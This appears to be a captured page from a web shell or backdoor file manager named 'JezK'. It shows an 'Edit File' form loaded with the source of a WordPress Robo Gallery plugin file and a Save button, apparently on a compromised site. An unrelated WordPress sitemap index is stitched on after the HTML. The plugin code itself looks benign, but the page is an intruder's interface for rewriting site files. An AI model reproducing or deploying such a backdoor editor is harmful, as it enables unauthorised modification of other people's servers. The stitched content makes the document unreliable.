
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: rbs_gallery_edit.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/*
*      Robo Gallery     
*      Version: 1.0
*      By Robosoft
*
*      Contact: https://robosoft.co/robogallery/ 
*      Created: 2015
*      Licensed under the GPLv2 license - http://opensource.org/licenses/gpl-2.0.php
*
*      Copyright (c) 2014-2019, Robosoft. All rights reserved.
*      Available only in  https://robosoft.co/robogallery/ 
*/

if ( ! defined( &#039;WPINC&#039; ) ) exit;

function rbs_gallery_group_metabox() {

	function rbs_gallery_set_checkbox_default_for_new_post( $default ) {
		return rbs_gallery_is_edit_page(&#039;edit&#039;) ? &#039;&#039; : ( $default ? (string) $default : &#039;&#039; );
	}

	if( rbs_gallery_is_edit_page(&#039;edit&#039;) ){
		rbs_gallery_include(&#039;rbs_gallery_options_copy.php&#039;, ROBO_GALLERY_OPTIONS_PATH);	
	} 

	rbs_gallery_include( array(
        &#039;cache.php&#039;,
        &#039;voting.php&#039;,
		&#039;rbs_gallery_options_guides.php&#039;,
		&#039;rbs_gallery_options_type.php&#039;,

	), ROBO_GALLERY_OPTIONS_PATH);

    if( rbs_gallery_is_edit_page(&#039;edit&#039;) ){
    	rbs_gallery_include( array(
    			&#039;rbs_gallery_options_shortcode.php&#039;,
    		), ROBO_GALLERY_OPTIONS_PATH);
    }

    rbs_gallery_include( array(
		&#039;rbs_gallery_options_text.php&#039;,
	), ROBO_GALLERY_OPTIONS_PATH);

    if( defined( &quot;ROBO_GALLERY_TYR&quot; ) &amp;&amp; ROBO_GALLERY_TYR  ) {

    	rbs_gallery_include( array(
			&#039;rbs_gallery_options_size.php&#039;,		
			&#039;rbs_gallery_options_view.php&#039;,		
			&#039;rbs_gallery_options_hover.php&#039;,		
			&#039;rbs_gallery_options_button.php&#039;,
		 ), ROBO_GALLERY_TYR_PATH_DIR.&#039;/includes/fields/&#039; );

    	rbs_gallery_include( array(
			&#039;rbs_gallery_options_loading.php&#039;,
		 ), ROBO_GALLERY_OPTIONS_PATH);

    	rbs_gallery_include( array(
			&#039;rbs_gallery_options_polaroid.php&#039;,		
			&#039;rbs_gallery_options_lightbox.php&#039;,
		 ), ROBO_GALLERY_TYR_PATH_DIR.&#039;/includes/fields/&#039; );

    } else {

		rbs_gallery_include( array(
			&#039;rbs_gallery_options_size_base.php&#039;,
			&#039;rbs_gallery_options_view_base.php&#039;,
			&#039;rbs_gallery_options_hover_base.php&#039;,		
			&#039;rbs_gallery_options_button_base.php&#039;,
			&#039;rbs_gallery_options_loading.php&#039;,
			&#039;rbs_gallery_options_polaroid_base.php&#039;,		
			&#039;rbs_gallery_options_lightbox_base.php&#039;,
		 ), ROBO_GALLERY_OPTIONS_PATH);
	}

	rbs_gallery_include( array(			
	    	&#039;rbs_gallery_options_css.php&#039;,
		 ), ROBO_GALLERY_OPTIONS_PATH);

}
add_action( &#039;cmbre2_init&#039;, &#039;rbs_gallery_group_metabox&#039; );</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
